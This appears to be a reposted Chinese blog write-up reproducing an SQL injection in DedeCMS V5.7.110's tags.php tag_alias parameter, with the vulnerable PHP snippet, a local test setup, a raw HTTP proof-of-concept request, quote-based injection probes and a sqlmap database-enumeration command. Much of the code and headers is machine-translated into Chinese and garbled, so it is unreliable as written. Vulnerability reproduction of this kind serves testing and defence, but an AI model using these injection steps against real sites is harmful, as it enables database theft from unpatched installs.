【漏洞复现】织梦内容管理系统(DedeCMS) V5.7.110 SQL注入,织梦cms怎么样

【漏洞复现】织梦内容管理系统(DedeCMS) V5.7.110 SQL注入DedeCMS简介 DEDECMS 是一种可以综合管理网站上各种栏目的通用工具,新闻、产品、文档、下载、音乐、教学视频……,通过模版技术

DedeCMS简介

DEDECMS是一款多功能工具,可让您全面管理网站上的各个栏目,包括新闻、产品、文档、下载、音乐和教育视频。模板技术使所有这些都在同一系统内更新和维护。 DedeCMS是目前国内最强大、最稳定的中小型门户网站建设解决方案之一,基于PHP+MySQL技术开发,所有源码对外开放。

开发语言:PHP

官网地址:https://www.dedecms.com/

源码信息:https://github.com/dedecms/DedeCMS

漏洞描述

DedeCMS 5.7.110 中发现了一个严重漏洞。此漏洞影响文件/uploads/tags.php 中的未知代码。操纵参数tag_alias 可能会导致SQL 注入。

影响版本

得得CMS V5.7.110

FOFA语句

还没有

漏洞代码

if(isset($_SERVER[\’QUERY_STRING\’]))

{

$tag=trim($_SERVER[\’QUERY_STRING\’]);

$tags=explode(\’/\’, $tag);

if(isset($tags[1])) {

if($tags[1]===\’别名\’) {

if(isset($tags[2])) $tag=$tags[2];

if(isset($tags[3])) $PageNo=intval($tags[3]);

全局$dsql;

$tag_alias=urldecode($tag);

$row=$dsql-GetOne(\’从`#@__tagindex`中选择*,其中tag_alias=\'{$tag_alias}\’\’);

$tag=$row[\’tag\’];

} 除此之外{

if(isset($tags[1])) $tag=$tags[1];

if(isset($tags[2])) $PageNo=intval($tags[2]);

}

}

}

环境搭建

请访问官网首页下载

本环境使用phpstudy搭建环境,将uploads目录下的文件复制到WWW目录下。

通过访问http://127.0.0.1/install/index.php并新建数据库安装DedeCMS后,直接下一步即可安装成功。

漏洞利用

POC

获取/uploads/tags.php?QUERY_STRING=alias/alias/bbb* HTTP/1.1

主机: 127.0.0.1

sec-ch-ua: \'(Not(A:Brand\’;v=\’8\’, \’铬\’;v=\’98\’

sec-ch-ua-mobile:0

sec-ch-ua-platform: \’Windows\’

不安全的升级请求: 1

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/98.0.4758.102 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: 无

Sec-Fetch-Mode: 导航

Sec-Fetch-User:1

Sec-Fetch-Dest: 文档

Accept-Encoding: gzip、deflate

接受语言: zh-CN,zh;q=0.9

Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1689668702,1689755217,1689908948,1690348034;

关闭连接:

访问链接http://127.0.0.1/uploads/tags.php?QUERY_STRING=alias/alias/123。

输入单引号时出错%27http://127.0.0.1/uploads/tags.php?QUERY_STRING=alias/alias/111%27

关闭单引号并像往常一样访问http://127.0.0.1/uploads/tags.php?QUERY_STRING=alias/alias/111%27%20and%201=1#。

SQL 映射:

sqlmap.py -u \’http://127.0.0.1/tags.php?QUERY_STRING=alias/alias/bbb*\’ -dbs –batch

#【漏洞复现】Dreamweaver内容管理系统(DedeCMS)V5.7.110 以上SQL注入相关内容来源网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92603.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月27日 下午5:36
下一篇 2024年6月27日 下午5:36

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注